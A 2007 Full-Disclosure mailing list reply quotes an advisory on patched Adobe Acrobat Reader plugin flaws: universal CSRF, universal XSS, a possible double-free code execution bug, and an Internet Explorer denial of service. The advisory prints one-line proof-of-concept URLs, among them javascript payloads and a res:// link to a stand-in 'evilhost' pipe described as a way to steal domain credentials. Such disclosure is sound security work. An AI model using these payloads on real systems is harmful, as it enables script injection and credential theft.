[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <6905b1570701030934i257a7faeid2fc485307269a4c@mail.gmail.com>
Date: Wed, 3 Jan 2007 17:34:13 +0000
From: "pdp (architect)" <pdp.gnucitizen@...glemail.com>
To: "Stefano Di Paola" <stefano.dipaola@...ec.it>
Cc: full-disclosure@...ts.grok.org.uk, Giorgio Fedon <giorgio.fedon@...il.com>
Subject: Re: Adobe Acrobat Reader Plugin - Multiple
Vulnerabilities
good work
On 1/3/07, Stefano Di Paola <stefano.dipaola@...ec.it> wrote:
> Adobe Acrobat Reader Plugin - Multiple Vulnerabilities
>
> Original Advisory:
> http://www.wisec.it/vulns.php?page=9
>
> Original Discovery and Research:
> Stefano Di Paola
>
> Contribution:
> Giorgio Fedon (IE Dos, UXSS Analysis)
> Elia Florio (Poc and Code Execution analysis)
>
> Status: Vendor Informed on 15 October 2006
> Patched: Yes
>
> Please upgrade your current version of adobe acrobat
>
> _______________________________________________________
>
> Brief Intro:
>
> During our lecture at 23C3 (Subverting Ajax), we presented
> some interesting attack vectors to take advantage of
> the dangerous vulnerability called "Prototype Hijacking"
> in browser frameworks. Any XSS represents a good
> entry point, and single Universal XSS is de facto the best
> entry point.
>
> Since Adobe did a great job and patched in less than 1
> month the issues herein reported, we decided to
> undisclose our findings during 23C3 to make the audience
> better understand risks and impacts of high-level plugins
> vulnerabilities (e.g. Func. Integration and not memory
> corruption).
>
> There is also a possible remote code execution (RCE), but
> was not the focus of our talk.
> Affected Versions:
> Adobe Acrobat Reader plugin 7 (fully patched) and Below
>
> Tested On:
> Firefox 1.5.0.7 and Below, 2.0RC2 under Windows XP SP2
> Firefox 1.5.0.7 and Below, 2.0RC2 under Ubuntu 6.06
> Internet Explorer SP2 under Windows XP SP2
>
> Summary:
>
> Adobe Acrobat plugin for Mozilla Firefox (acroreader) is able to
> populate Portable Documents
> (PDF files) forms by supplying an external set of datas through the FDF,
> XML, or XFDF fields.
> Implementation of FDF, XML, XFDF
> (http://partners.adobe.com/public/developer/en/acrobat/PDFOpenParameters.pdf)
> functionalities in Acrobat Reader Plugin is vulnerable to different kind
> of attacks.
> Vulnerability extent changes from browser to browser:
>
> 1. Universal CSRF / session riding;
> (Mozilla Firefox, Internet Explorer, Opera + Acrobat Reader plugin)
>
> 2. UXSS in #FDF, #XML e #XFDF;
> (Mozilla Firefox + Acrobat Reader plugin)
>
> 3. Possible Remote Code Execution;
> (Mozilla Firefox + Acrobat Reader plugin)
>
> 4. Denial of Service;
> (Internet Explorer + Acrobat Reader plugin)
>
> ______________________________________
>
>
> 1. Universal CSRF and session riding
>
>
> This is probably Adobe related as all tested browsers (IE,Firefox,Opera)
> where affected.
> The issue is that by creating a special link like this:
>
> http://site.com/file.pdf#FDF=http://victim.com/index.html?param=...
>
> automatically Adobe plugin sends a request to 'victim.com' without user
> interaction asking
> for defined page in 'fdf' parameter. This could be used as a Universal
> Session Riding (aka UCSRF)
> attack which is a well known vulnerability.
> Note that the same effect is accomplished by using 'xml' and 'xfdf'
> parameters.
>
>
> =====
>
> 2. UXSS in #FDF, #XML e #XFDF
>
> In addition by using the following request, is possible to execute
> javascript code
> inside Firefox browser:
>
> http://site.com/file.pdf#FDF=javascript:alert('Test Alert')
>
> The previous could be triggered against a site and because of this is a
> Universal Cross Site
> Scripting.
> UXSS is a particular type of Cross Site Scripting and has the ability to
> be triggered
> by exploiting flaws inside browsers, instead of leveraging the
> vulnerabilities against
> insecure web sites. It's also possible to force clients to download
> files by supplying:
>
> http://site.com/file.pdf#FDF=javascript:document.location=
> 'file://C:/winnt/notepad.exe'
>
> <Alternative_Attack>
>
> Alternative Attack using NamedPipes
> - http://www.514.es/2006/10/exploiting_win32_design_flaws.html
>
> In order to steal Domain credentials with explorer :
>
> http://anyhost/file.pdf#fdf=res://\\evilhost\pipe\apipe
>
> and then by applying techniques found in 514.es paper we found
> this kind of url and protocol (res://) could be used too.
>
> This means that also Internet Explorer could be abused in conjunction
> of
> Adobe plugin to make attacks on internal LANs and get victims
> credentials.
>
> </Alternative_Attack>
>
>
> 3. Possible Remote Code Execution
> There is also a possible Remote code Execution by leveraging a memory
> corruption inside
> Firefox by supplying the following request:
>
> http://site.com/file.pdf#FDF=javascript:document.write('jjjjj...');
>
> It's possible to cause a DoubleFree() error and to overwrite part of the
> Structural
> Exception Handler.
>
> Runtime vulnerability analisys
> The problem seems to be caused by a "Double MSVCRT.free()" executed by
> Acrobat plugin.
> The routine which cause Firefox to crash is located in the following
> call to NP_Shutdown().
>
> Elia Florio is credited for Runtime analysis and exploitation.
>
> NB. The POC of this vulnerability won't be released.
>
> =====
>
> 4. Denial of Service (Internet Explorer only);
>
> By supplying the following request via the web browser,
> it's possible to cause a denial of service in Internet Explorer:
>
> http://site.com/file.pdf#####...(More '#')
>
> The application is waiting for more inputs and allocates more memory.
>
>
>
>
> --
> ...oOOo...oOOo....
> Stefano Di Paola
> Software & Security Engineer
>
> Web: www.wisec.it
> ..................
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists